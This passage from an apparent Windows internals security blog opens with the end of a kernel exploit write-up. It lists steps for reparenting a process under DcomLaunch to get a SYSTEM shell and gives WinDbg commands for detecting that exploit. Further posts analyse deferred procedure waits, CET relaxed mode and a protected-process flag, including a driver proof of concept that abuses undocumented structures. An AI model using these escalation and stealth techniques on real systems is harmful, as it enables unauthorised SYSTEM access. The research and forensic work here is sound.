I chose to use the technique that Alex and I demonstrated in Faxhell – creating a new process and reparenting it to a non-suspicious system-level parent, which makes the new process run as SYSTEM. As a parent I chose the same one we used in Faxhell – the DcomLaunch service.

The full explanation of this technique can be found in the blog post about faxhell, so I will just briefly explain the steps:

  1. Use the exploit to receive SeDebugPrivilege.
  2. Open the DcomLaunch service, query it to receive the PID and open the process with PROCESS_ALL_ACCESS.
  3. Initialize process attributes and pass in the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute and the handle to DcomLaunch to set it as the parent.
  4. Create a new process using these attributes.

I implemented all those steps and…

Got a cmd process running as SYSTEM under DcomLaunch!

Forensics

Since this exploitation method leaves queued notifications that will never get removed, it’s relatively easy to find in memory – if you know where to look.

We go back to our WinDbg command from earlier and parse the GUID table. This time we also add the header to the ETW_REG_ENTRY list, and the number of items on the list:

dx -r0 @$GuidTable = ((nt!_ESERVERSILO_GLOBALS*)&nt!PspHostSiloGlobals)->EtwSiloState->EtwpGuidHashTable
dx -g @$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid]).Where(list => list.Flink != &list).Select(list => (nt!_ETW_GUID_ENTRY*)(list.Flink)).Select(Entry => new { Guid = Entry->Guid, Refs = Entry->RefCount, SD = Entry->SecurityDescriptor, Reg = (nt!_ETW_REG_ENTRY*)Entry->RegListHead.Flink, RegCount = Debugger.Utility.Collections.FromListEntry(Entry->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Count()})

As expected, we can see here 3 GUIDs – the first one, that was already registered in the system the first time we checked, the second, which we are using for our exploit, and the test GUID, which we registered as part of our attempts.

Now we can use a second command to see who is using these GUIDs. Unfortunately, there is no nice way to view the information for all GUIDs at once, so we’ll need to pick one at a time. When doing actual forensic analysis, you’d have to look at all the GUIDs (and probably write a tool to do this automatically), but since we know which GUID our exploit is using we’ll just focus on it.

We’ll save the GUID entry in slot 42:

dx -r0 @$exploitGuid = (nt!_ETW_GUID_ENTRY*)(@$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid])[42].Flink)

And print the information about all the registered instances in the list:

dx -g @$regEntries = Debugger.Utility.Collections.FromListEntry(@$exploitGuid->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Select(r => new {ReplyQueue = r.ReplyQueue, ReplySlot = r.ReplySlot, UsedSlots = r.ReplySlot->Where(s => s != 0).Count(), Caller = r.Caller, SessionId = r.SessionId, Process = r.Process, ProcessName = ((char[15])r.Process->ImageFileName)->ToDisplayString("s"), Callback = r.Callback, CallbackContext = r.CallbackContext})

We can see that all instances are registered by the same process (conveniently named “exploit_part_1”). This fact by itself is suspicious, since a process usually has no reason to register the same GUID more than once, and tells us we should probably look further into this.

If we want to investigate these suspicious entries a bit more, we can look at one of the notification queues:

dx -g @$regEntries[0].ReplySlot

These look even more suspicious – their Flags are ETW_QUEUE_ENTRY_FLAG_HAS_REPLY_OBJECT (2) but their ReplyObject fields don’t look right – they are not aligned the way objects are supposed to be.

We can run !pool on one of the objects and see that this address is actually somewhere inside a token object:

And if we check the address of the token belonging to the exploit_part_1 process:

dx @$regEntries[0].Process->Token.Object & ~0xf
@$regEntries[0].Process->Token.Object & ~0xf : 0xffff908912ded0a0
? 0xffff908912ded112 - 0xffff908912ded0a0
Evaluate expression: 114 = 00000000`00000072

We’ll see that the address in the first ReplyObject is 0x72 bytes past the token address, so it points inside this process’ token. Since a ReplyObject should point to an ETW registration object, and definitely not into the middle of a token, this is a clear indicator of suspicious behavior by this process.

Show Me The Code

The full PoC can be found in the GitHub repository.

Conclusion

One of the things I wanted to show in this blog post is that there is almost no such thing as a “simple” exploit anymore. And 5000 words later, I think this point should be clear enough. Even a vulnerability like this, which is pretty easy to understand and very easy to trigger, still takes a significant amount of work and understanding of internal Windows mechanisms to turn into an exploit that doesn’t immediately crash the system, and even more work to do anything useful with.

That being said, these kinds of exploits are the most fun — because they don’t rely on any ROP or HVCI violations, and have nothing to do with XFG or CET or page tables or PatchGuard. Simple, effective, data-only attacks will always be the Achilles’ heel of the security industry, and will most likely always exist in some form.

This post focused on how we can safely exploit this vulnerability, but once we got our privileges, we did pretty standard stuff with them. In future posts, I might showcase some other interesting things to do with arbitrary increments and token objects, which are more interesting and complicated, and maybe make attacks harder to detect too.

DPWs are the new DPCs : Deferred Procedure Waits in Windows 10 21H1

With the Windows 21H1 (Iron/“Fe”) feature complete deadline looming, the last few Dev Channel builds have had some very interesting changes and additions, which will probably require a few separate blog posts to cover fully. One of those was in a surprising part of the code – object wait dispatching.

The new build introduced a few new functions:

  • KeRegisterObjectDpc (despite the name, it’s an internal non-exported function)
  • ExQueueDpcEventWait
  • ExCancelDpcEventWait
  • ExCreateDpcEvent
  • ExDeleteDpcEvent

All those functions are part of a new and interesting piece of functionality – the ability to wait on an (event) object and execute a DPC when it becomes signaled. Until now, if a driver wanted to wait on an object it had to do so synchronously – the current thread would be put in a wait state until the object being waited on was signaled, the wait timed out, or an APC executed (if the wait was alertable). User-mode applications typically perform waits in the same manner; however, since Windows 8 they’ve also had the ability to perform asynchronous waits through the Thread Pool API, which associates an I/O Completion Port with a “Wait Packet”, obviating the need for a waiting thread.

The change in 21H1, through the addition of these APIs, marks a major change for kernel-mode waits by introducing kernel-mode asynchronous waits: a driver can now supply a DPC that will be executed when the event object that is waited on is signaled all while continuing its execution in the meantime.

The Mechanism

To use this new capability, a driver must first initialize a so-called “DPC Event”. To initialize this structure we have the new API ExCreateDpcEvent:

NTSTATUS
ExCreateDpcEvent (
    _Outptr_ PVOID *DpcEvent,
    _Outptr_ PKEVENT *Event,
    _In_ PKDPC Dpc
);

Internally, this allocates a new undocumented structure that I chose to call DPC_WAIT_EVENT:

typedef struct _DPC_WAIT_EVENT
{
    KWAIT_BLOCK WaitBlock;
    PKDPC Dpc;
    PKEVENT Event;
} DPC_WAIT_EVENT, *PDPC_WAIT_EVENT;

This API receives a DPC that the caller must have previously initialized with KeInitializeDpc (you can guess who spent a day debugging things by forgetting to do this). In turn, it creates an event object, allocates a DPC_WAIT_EVENT structure that is returned to the caller, fills it with a pointer to the caller’s DPC and the newly created event, and sets the wait block state to WaitBlockInactive.

Then, the driver needs to call the new ExQueueDpcEventWait function, passing in the structure:

BOOLEAN
ExQueueDpcEventWait (
    _In_ PDPC_WAIT_EVENT DpcEvent,
    _In_ BOOLEAN QueueIfSignaled
    )
{
    if (DpcEvent->WaitBlock.BlockState != WaitBlockInactive)
    {
        RtlFailFast(FAST_FAIL_INVALID_ARG);
    }
    return KeRegisterObjectDpc(DpcEvent->Event,
                               DpcEvent->Dpc,
                               &DpcEvent->WaitBlock,
                               QueueIfSignaled);
}

As can be seen, this function is very simple – it unpacks the structure and sends the contents to the internal KeRegisterObjectDpc:

BOOLEAN
KeRegisterObjectDpc (
    _In_ PVOID Object,
    _In_ PRKDPC Dpc,
    _In_ PKWAIT_BLOCK WaitBlock,
    _In_ BOOLEAN QueueIfSignaled
);

You might wonder, like me – doesn’t the “e” in “Ke” stand for “exported”? Was I lied to the whole time? Is this a mistake? Was this a last minute change? Does MS not have any design or code review? I’m as confused as you are.

But before talking about KeRegisterObjectDpc, we need to investigate another small detail. To enable this functionality, the KWAIT_BLOCK structure can now store a KDPC to queue, and the WAIT_TYPE enumeration has a new WaitDpc option:

typedef struct _KWAIT_BLOCK
{
    LIST_ENTRY WaitListEntry;
    UCHAR WaitType;
    volatile UCHAR BlockState;
    USHORT WaitKey;
#if defined(_WIN64)
    LONG SpareLong;
#endif
    union {
        struct KTHREAD* Thread;
        struct KQUEUE* NotificationQueue;
        struct KDPC* Dpc;
    };
    PVOID Object;
    PVOID SparePtr;
} KWAIT_BLOCK, *PKWAIT_BLOCK, *PRKWAIT_BLOCK;

typedef enum _WAIT_TYPE
{
    WaitAll,
    WaitAny,
    WaitNotification,
    WaitDequeue,
    WaitDpc,
} WAIT_TYPE;

Now we can look at KeRegisterObjectDpc, which is pretty simple and does the following:

  1. Initializes the wait block
    1. Sets the BlockState field to WaitBlockActive,
    2. Sets the WaitType field to WaitDpc
    3. Sets the Dpc field to point to the received DPC
    4. Sets the Object field to the received object.
  2. Raises the IRQL to DISPATCH_LEVEL
  3. Acquires the lock for the object, found in its DISPATCHER_HEADER.
  4. If the object is not signaled – inserts the wait block into the wait list for the object and releases the lock, then lowers the IRQL
  5. Otherwise, if the object is signaled:
    1. Satisfies the wait for the object, resetting the signal state as required for the object
    2. If the QueueIfSignaled parameter was set, goes to step 3
    3. Otherwise,
      1. Sets BlockState to WaitBlockInactive
      2. Queues the DPC
  6. Releases the lock and calls KiExitDispatcher (which will lower the IRQL and make the DPC execute immediately).

Then the function returns. If the object was not signaled, the driver’s execution continues, and when the object gets signaled the DPC will be executed. If the object is already signaled, the DPC is executed immediately (unless the QueueIfSignaled parameter was set to TRUE).

If the wait is no longer needed, the driver should call ExCancelDpcEventWait to remove the wait block from the wait queue. And when the event is not needed it should call ExDeleteDpcEvent to dereference the event and free the opaque DPC_WAIT_EVENT structure.

Meanwhile, the various internal dispatcher functions that take care of signaling an object have been extended to handle the WaitDpc case – instead of unwaiting the thread (WaitAny/WaitAll), or waking up a queue waiter (WaitNotification), a call to KeInsertQueueDpc is now done for the WaitDpc case (since wait satisfaction is done at DISPATCH_LEVEL, the DPC will then immediately execute once KiExitDispatcher is called by one of these functions).

The Limitations

You might have noticed that while the functionality in KeRegisterObjectDpc is generic, all these structures and exported functions only support an event object. Furthermore, looking inside ExCreateDpcEvent, we can see that it only creates an event object:

status = ObCreateObject(KernelMode,
                        ExEventObjectType,
                        NULL,
                        KernelMode,
                        NULL,
                        sizeof(KEVENT),
                        0,
                        0,
                        &event);

But as KeRegisterObjectDpc suggests, an event is not the only object that can be asynchronously waited on. The usage of KiWaitSatisfyOther suggests that any generic dispatcher object can be used, except for mutexes, which need to handle ownership rules. Since a driver might need to wait on a process, a thread, a semaphore, or any other object, why are we only allowed to wait on an event here?

The answer in this case is probably that this was not designed to be a generic feature available to all drivers. So far, I could only see one Windows component calling these new functions – Vid.sys (the Hyper-V Virtualization Infrastructure Driver). Digging deeper, it looks like it is using this new capability to implement the new WHvCreateTrigger API added to the documented Hyper-V Platform API in WinHvPlatform.h. “Triggers” are new functionality exposed in 21H1 to send virtual interrupts to a Hyper-V partition. The importance of Microsoft’s Azure/Hyper-V platform play is clearly evident here – low-level changes to the kernel dispatcher, for the first time in a decade, simply to optimize the performance of virtual machine-related APIs.

As such, since it is only designed to support this one specific case, this feature is built to only wait on an event object. But even with that in mind, the design is a bit funny – ExCreateDpcEvent will create an event object and return it to the caller, which then has to re-open it with ObOpenObjectByPointer to use it in any way, since most wait-related APIs require a HANDLE (as does exposing the object to user-mode, as Vid.sys intends to do). And we can see vid.sys doing exactly that:

Why not simply expose KeRegisterObjectDpc and let it receive an object pointer that will be waited on, since this function doesn’t care about the object type? Why do we even need a new structure to manage this information? I don’t know. The current implementation doesn’t seem like the most logical one, and it limits the feature significantly, but it is the Microsoft way.

If I had to guess, I would expect to see this feature changing in the future to support more object types as Microsoft internally finds more uses for asynchronous waits in the kernel. I will not be surprised to see an ExQueueDpcEventWaitEx function added soon… and perhaps documenting this API to 3rd parties.

But not all is lost. If you’re willing to bend the rules a little and upset a few people in the OSR forums, you can wait on any non-mutex (dispatcher) object you want, simply by replacing the pointer inside the DPC_WAIT_EVENT structure that is returned to you. Neither ExQueueDpcEventWait nor KeRegisterObjectDpc cares about which type of object is being passed in, as long as it’s a legitimate dispatcher object. I’m sure there’s an NT_ASSERT in the checked build, but it’s not like those still exist.

The risk here (as OSR people will gladly tell you) is that the new structure is undocumented and might change with no warning, as are the functions handling it. So, replacing the pointer and hoping that the offset hasn’t changed and that the functions will not be affected by this change is a risky choice that is not recommended in a production environment. Now that I’ve said it, I have no doubt we will see crash dumps caused by AV products attempting to do exactly that, poorly.

PoC

To demonstrate how this mechanism works and how it can be used for objects other than events I wrote a small driver that registers a DPC that waits for a process to terminate.

On DriverEntry, this driver initializes a push lock that will be used later. It also registers a process creation callback:

NTSTATUS
DriverEntry (
    _In_ PDRIVER_OBJECT DriverObject,
    _In_ PUNICODE_STRING RegistryPath
    )
{
    DriverObject->DriverUnload = DriverUnload;
    ExInitializePushLock(&g_WaitLock);
    return PsSetCreateProcessNotifyRoutineEx(&CreateProcessNotifyRoutineEx, FALSE);
}

Whenever our CreateProcessNotifyRoutineEx callback is called, it checks if the new process name ends with “cmd.exe”:

VOID
CreateProcessNotifyRoutineEx (
    _In_ PEPROCESS Process,
    _In_ HANDLE ProcessId,
    _In_ PPS_CREATE_NOTIFY_INFO CreateInfo
    )
{
    NTSTATUS status;
    DECLARE_CONST_UNICODE_STRING(cmdString, L"cmd.exe");

    UNREFERENCED_PARAMETER(ProcessId);

    //
    // If process name is cmd.exe, create a dpc
    // that will wait for the process to terminate
    //
    if ((!CreateInfo) ||
        (!RtlSuffixUnicodeString(&cmdString, CreateInfo->ImageFileName, FALSE)))
    {
        return;
    }
    ...
}

If the process is cmd.exe, we will create a DPC_WAIT_EVENT structure that will wait for the process to be signaled, which happens when the process terminates. For the purpose of this PoC I wanted to keep things simple and avoid having to keep track of multiple wait blocks. So only the first cmd.exe process will be waited on and the rest will be ignored.

First, we need to declare some global variables for the important structures, as well as the lock that we initialized on DriverEntry and the DPC routine that will be called when the process terminates:

static KDEFERRED_ROUTINE DpcRoutine;
PDPC_WAIT_EVENT g_DpcWait;
EX_PUSH_LOCK g_WaitLock;
KDPC g_Dpc;
PKEVENT g_Event;

static
void
DpcRoutine (
    _In_ PKDPC Dpc,
    _In_ PVOID DeferredContext,
    _In_ PVOID SystemArgument1,
    _In_ PVOID SystemArgument2
    )
{
    DbgPrintEx(DPFLTR_IHVDRIVER_ID,
               DPFLTR_ERROR_LEVEL,
               "Process terminated\n");
}

Then, back in our process creation callback, we will initialize the DPC object and allocate a DPC_WAIT_EVENT structure using KeInitializeDpc and ExCreateDpcEvent. To avoid a race we will use our lock.

void
CreateProcessNotifyRoutineEx (
    ...
    )
{
    ...
    ExAcquirePushLockExclusive(&g_WaitLock);
    if (g_DpcWait == nullptr)
    {
        KeInitializeDpc(&g_Dpc, DpcRoutine, &g_Dpc);
        status = ExCreateDpcEvent(&g_DpcWait,&g_Event,&g_Dpc);
        if (!NT_SUCCESS(status))
        {
            DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                       DPFLTR_ERROR_LEVEL,
                       "ExCreateDpcEvent failed with status: 0x%x\n",
                       status);
            ExReleasePushLockExclusive(&g_WaitLock);
            return;
        }
        ...
    }
    ExReleasePushLockExclusive(&g_WaitLock);
}

ExCreateDpcEvent creates an event object and places a pointer to it in our new DPC_WAIT_EVENT structure. But since we want to wait on a process, we need to replace that event pointer with the pointer to the EPROCESS of the new cmd.exe process. Then we can go on to queue our wait block for the process:

void
CreateProcessNotifyRoutineEx (
    _In_ PEPROCESS Process,
    ...
    )
{
    NTSTATUS status;
    //
    // Only wait on one process
    //
    ExAcquirePushLockExclusive(&g_WaitLock);
    if (g_DpcWait == nullptr)
    {
        KeInitializeDpc(&g_Dpc, DpcRoutine, &g_Dpc);
        status = ExCreateDpcEvent(&g_DpcWait, &g_Event, &g_Dpc);
        if (!NT_SUCCESS(status))
        {
            DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                       DPFLTR_ERROR_LEVEL,
                       "ExCreateDpcEvent failed with status: 0x%x\n",
                       status);
            ExReleasePushLockExclusive(&g_WaitLock);
            return;
        }
        NT_ASSERT(g_DpcWait->Object == g_Event);
        g_DpcWait->Object = (PVOID)Process;
        ExQueueDpcEventWait(g_DpcWait, TRUE);
    }
    ExReleasePushLockExclusive(&g_WaitLock);
}

And that’s it! When the process terminates our DPC routine will be called, and we can choose to do whatever we want there:

The only other thing we need to remember is to clean up after ourselves before unloading, by setting the pointer back to the event (that we saved for that purpose), canceling the wait and deleting the DPC_WAIT_EVENT structure:

VOID
DriverUnload (
    _In_ PDRIVER_OBJECT DriverObject
    )
{
    UNREFERENCED_PARAMETER(DriverObject);

    PsSetCreateProcessNotifyRoutineEx(&CreateProcessNotifyRoutineEx, TRUE);

    //
    // Change the DPC_WAIT_EVENT structure to point back to the event,
    // cancel the wait and destroy the structure
    //
    if (g_DpcWait != nullptr)
    {
        g_DpcWait->Object = g_Event;
        ExCancelDpcEventWait(g_DpcWait);
        ExDeleteDpcEvent(g_DpcWait);
    }
}

Forensics

Apart from the legitimate uses of asynchronous waits for drivers, this is also a new and stealthy way to wait on all kinds of objects without using other, more well-known mechanisms that are easy to notice and detect, such as process callbacks used to wait on process termination.

The main way to detect whether someone is using this technique is to inspect the wait queues of objects in the system. For example, let’s use the Windbg Debugger Data Model to inspect the wait queues of all processes in the system. To get a nice table view we’ll only show the first wait block for each process, though of course that doesn’t give us the full picture:

dx -g @$procWaits = @$cursession.Processes.Where(p => (__int64)&p.KernelObject.Pcb.Header.WaitListHead != (__int64)p.KernelObject.Pcb.Header.WaitListHead.Flink).Select(p => Debugger.Utility.Collections.FromListEntry(p.KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry")[0]).Select(p => new { WaitType = p.WaitType, BlockState = p.BlockState, Thread = p.Thread, Dpc = p.Dpc, Object = p.Object, Name = ((char*)((nt!_EPROCESS*)p.Object)->ImageFileName).ToDisplayString("sb")})

We mostly see here waits of type WaitNotification (2), which is what we expect – user-mode threads asynchronously waiting for processes to exit. Now let’s load our driver and run a new query that only picks processes that have wait blocks of type WaitDpc (4):

dx @$dpcwaits = @$cursession.Processes.Where(p => (__int64)&p.KernelObject.Pcb.Header.WaitListHead != (__int64)p.KernelObject.Pcb.Header.WaitListHead.Flink && Debugger.Utility.Collections.FromListEntry(p.KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry").Where(p => p.WaitType == 4).Count() != 0)

[0x6b0]          : cmd.exe [Switch To]

Now we only get one result – the cmd.exe process that our driver is waiting on. Now we can dump its whole wait queue and see who is waiting on it. We will also use a little helper function to show us the symbol that the DPC’s DeferredRoutine is pointing to:

dx -r0 @$getsym = (x => Debugger.Utility.Control.ExecuteCommand(".printf\"%y\", " + ((__int64)x).ToDisplayString("x")))

dx -g Debugger.Utility.Collections.FromListEntry(@$dpcwaits.First().KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry").Select(p => new { WaitType = p.WaitType, BlockState = p.BlockState, Thread = p.Thread, Dpc = p.Dpc, Object = p.Object, Name = ((char*)((nt!_EPROCESS*)p.Object)->ImageFileName).ToDisplayString("sb"), DpcTarget = (@$getsym(p.Dpc->DeferredRoutine))[0]})

Only one wait block is queued for this process, and it’s pointing to our driver!

This analysis process can also be converted to JavaScript to have a bit more control over the presentation of the results, or to C to automatically check the wait queues of different objects (keep in mind it is extremely unsafe to do this at runtime due to the lock synchronization required – using the COM/C++ Debugger API to do forensics on a memory dump or live dump is the preferred way to go).

Conclusion

This new addition to the Windows kernel is exciting since it allows the option of asynchronous waits for drivers, a capability that only existed for user-mode until now. I hope we will see this extended to properly support more object types soon, making this feature generically useful to all drivers in various cases.

The implementation of all the functions discussed in this post can be found here.

Read our other blog posts:

CET Updates – CET on Xanax

Windows 21H1 CET Improvements

Since Alex and I published our first analysis of CET, Windows’ support for user-mode CET received a few important changes that should be noted. We can easily spot most of them by looking at the changes to the MitigationFlags2 field of the EPROCESS, when comparing Windows 10 Build 19013 with 20226:

There are a lot of new mitigation flags here, and a few of them are related to CET:

  • CetUserShadowStackStrictMode – annoyingly, this does not mean the same thing as Strict CFG. Strict CET means that CET will be enforced for the process, regardless of whether it’s compiled as CET compatible or not.
  • BlockNonCetBinaries – as the name suggests, this feature blocks binaries that were not compiled with CET support from being loaded into the process — just like Strict CFG.
  • CetDynamicApisOutOfProcOnly – At first CET was supposed to block all non-approved RIP changes. That was too much, so it was toned down to only block most non-approved RIP targets. Then MS remembered dynamic memory, and couldn’t force dynamic memory to comply with CET but insisted that allowing dynamic targets was only supported out of proc, so not really a security risk. And now it seems that in proc dynamic APIs are allowed by default and processes have to manually opt-out of that by setting this flag. In their defense, the flag is already set for most important Windows processes such as winlogon.exe, lsass.exe, csrss.exe and svchost.exe. But I’m sure that’s OK and we’ll never see CET bypasses abusing dynamic APIs in proc.
  • UserCetSetContextIpValidationRelaxedMode – Even after all the adjustments that were made in order to not break any existing code, CET was still a bit too anxious, resulting in this new mitigation. This new flag has a pretty curious name that might draw your attention. If it did – good! Because this is the CET feature that this blog post will focus on.

But even without knowing the purpose of any of those, the number of new CET flags alone hints that we are not likely to see CET being fully enforced across the system any time soon.

Relaxed Mode

The least obvious of those new flags is the “relaxed mode” option. Was CET too anxious to handle 2020 and needed a bit of a break from everything? Well, if it did, I think we can all relate to that and shouldn’t judge too harshly.

This flag can be set on process creation, by calling UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY and PROCESS_CREATION_MITIGATION_POLICY2_USER_CET_SET_CONTEXT_IP_VALIDATION_RELAXED_MODE as the mitigation policy flag.

It can also be set with a currently-undocumented linker flag, which will set the new IMAGE_DLLCHARACTERISTICS_EX_CET_SET_CONTEXT_IP_VALIDATION_RELAXED_MODE value in the PE header information (see the end of the post for the definition).

Once the flag is set, it is only used in two places – KeVerifyContextIpForUserCet and KiContinuePreviousModeUser. Both read it from the EPROCESS and pass a Boolean value into KiVerifyContextIpForUserCet to indicate whether it’s enabled or not. Inside KiVerifyContextIpForUserCet we can see this new addition that checks this argument:

RtlZeroMemory(&unwindState, sizeof(unwindState));
if (continueType == KCONTINUE_UNWIND)
{
    status = RtlVerifyUserUnwindTarget(userRip, KCONTINUE_UNWIND, &unwindState);
    if (NT_SUCCESS(status))
    {
        return status;
    }
}

if ((RelaxedMode != FALSE) && (continueType != KCONTINUE_RESUME))
{
    if (unwindState.CheckedLoadConfig == FALSE)
    {
        status = RtlGetImageBaseAndLoadConfig(userRip, &unwindState.ImageBase, &unwindState.LoadConfig);
        unwindState.CheckedLoadConfig = NT_SUCCESS(status) ? TRUE : unwindState.CheckedLoadConfig;
    }

    if (unwindState.CheckedLoadConfig != FALSE)
    {
        if (unwindState.ImageBase != NULL)
        {
            __try
            {
                ProbeForRead(unwindState.LoadConfig,
                             RTL_SIZEOF_THROUGH_FIELD(IMAGE_LOAD_CONFIG_DIRECTORY64, GuardEHContinuationCount),
                             sizeof(UCHAR));

                if ((unwindState.LoadConfig != NULL) &&
                    (unwindState.LoadConfig->Size >= RTL_SIZEOF_THROUGH_FIELD(IMAGE_LOAD_CONFIG_DIRECTORY64, GuardEHContinuationCount)) &&
                    (BooleanFlagOn(unwindState.LoadConfig->GuardFlags, IMAGE_GUARD_EH_CONTINUATION_TABLE_PRESENT)))
                {
                    goto CheckAddressInShadowStack;
                }
            }
            __except (EXCEPTION_EXECUTE_HANDLER)
            {
                goto CheckAddressInShadowStack;
            }
            return STATUS_SUCCESS;
        }
        return STATUS_SUCCESS;
    }
}

At first look, this might seem like a lot and could be confusing. But with some context it becomes a lot clearer. When implementing CET support, Microsoft ran into a problem. NtSetContextThread is widely used across the system by processes that don’t necessarily respect the new “rules” of CET, and might use it to set RIP to addresses that are not found in the shadow stack. Those processes might also unwind into addresses that are not considered valid by CET, and since they were not compiled with proper CET support they will have neither Static nor Dynamic Exception Handler Continuation Targets (which we wrote about in the previous post) that are recognized by CET. It won’t be possible to enable CET across the system without breaking all those processes, some of which, like Python, are very common. So, an option was added to “relax” CetSetContextIpValidation for those cases.

This check will be done for two continue types – all cases of KCONTINUE_SET, and cases of KCONTINUE_UNWIND where RtlVerifyUserUnwindTarget failed.

To know whether we are looking at such a case, KiVerifyContextIpForUserCet reads the IMAGE_LOAD_CONFIG_DIRECTORY structure from the headers of the module that contains the new RIP value. If the module has no image base, no load config or no Exception Handler Continuation Table, the function assumes that this is a module that is incompatible with CET and allows the action. But if the module has an Exception Handler Continuation Table, the new RIP value will be checked against the shadow stack, just as if relaxed mode had not been enabled.

A fun side effect of this is that for any process where “relaxed mode” is enabled, setting the context or unwinding into JIT’ed code will always be permitted.

Load Config Directory Capturing

As part of this change MS also added a new UNWIND_STATE structure (that is our name, as this new structure is not in the public symbols) to hold the load configuration pointer and avoid reading the headers more than once. The new structure looks like this:

typedef struct _UNWIND_STATE
{
    PVOID ImageBase;
    PIMAGE_LOAD_CONFIG_DIRECTORY64 LoadConfig;
    BOOLEAN CheckedLoadConfig;
} UNWIND_STATE, *PUNWIND_STATE;

The CheckedLoadConfig flag is used to indicate that the LoadConfig pointer is already initialized and does not need to be read again. We’ll leave it as an exercise for the reader as to why this change was introduced.

Forward-thinking Downgrades

As hardware supporting CET is about to be released and will hopefully become common over the next few years, the Windows implementation of CET doesn’t seem to be fully prepared for the change, and it looks like new challenges are only being discovered now. And judging by these “reserved” image flags, it seems that some developers are expecting more CET changes and downgrades in the future…


Critical, Protected, DUT Processes in Windows 10

We are all familiar with Microsoft’s love for creating new and exciting ways to prevent certain processes from being terminated by the user. First were Critical processes in Windows XP 64-bit and Server 2003, which crashed the kernel if you killed them. Then came Protected Process Light (PPL) in Windows 8.1, which prevented you from killing them at all. Perhaps it prevented too many other things too, because in a recent Windows 10 update, build 20161, we see yet another new addition to the EPROCESS flags (Flags3, actually), called DisallowUserTerminate:

As this flag’s name is pretty clear, its purpose doesn’t need much explanation – any process that has this flag set cannot be terminated from user-mode. We can see that in PspProcessOpen:

A user-mode caller can’t open a handle to a process that has the DisallowUserTerminate flag set if the requested access mask contains PROCESS_TERMINATE.

So where is this flag set, and does this mean you can protect your processes from termination? The answer to the second question is simple – not really. For now, this flag can only be set by one path, and it’s one specifically used for creating Hyper-V Memory Host (vmmem) processes.

Internally, this flag is set on process creation by PspAllocateProcess, based on the input parameter CreateFlags – flag 8 (let’s call it PSP_CREATE_PROCESS_FLAG_DISALLOW_TERMINATE) is what sets DisallowUserTerminate as you can see below:

Unfortunately, this function only has 2 external callers, which always pass in 0 as CreateFlags, which obviously doesn’t allow one to set any of these flags. The third, internal caller, is PsCreateMinimalProcess, which has a few internal uses in the system, such as the creation of Pico Processes used by WSL, and other special system processes such as “Memory Compression” and “Registry”. Minimal processes are also created by VmCreateMemoryProcesses, which is one of the APIs that’s exported through the VID Extension Host that myself, Gabrielle, and Alex described in our INFILTRATE 2020 talk.

Unlike the exported functions, the PsCreateMinimalProcess internal API receives the CreateFlags from its callers and forwards them to PspAllocateProcess, and VmCreateMemoryProcesses passes in PSP_CREATE_PROCESS_FLAG_DISALLOW_TERMINATE (0x8) unconditionally, as well as PSP_CREATE_PROCESS_FLAG_VM_PROCESSOR_HOST (0x4) if flag 0x20 (let’s call it VMP_CREATE_PROCESS_FLAG_VM_PROCESSOR_HOST) was sent to it. You can see this logic below:

As mentioned, looking for callers for this function in IDA will not show any results, because this function, which is not exported, is shared with Vid.sys through an extension host and called by VsmmNtSlatMemoryProcessCreate when new vmmem processes are needed to manage memory in virtual machines managed by Hyper-V, and/or to contain the Virtual Processor (VP) scheduler threads when eXtended Scheduling (XS) is enabled as part of Windows Defender Application Guard (WDAG), Windows Containers, or Windows Sandbox.

Checking the value of Flags3 in vmmem processes in the new build shows that DisallowUserTerminate is enabled for these processes:

Sadly, no other process can use this capability for now without manually editing the EPROCESS structure, which is extremely not recommended, as any code doing this is bound to break often and crash a lot of systems. So I’m sure 5 different AV companies are already adding code to it.
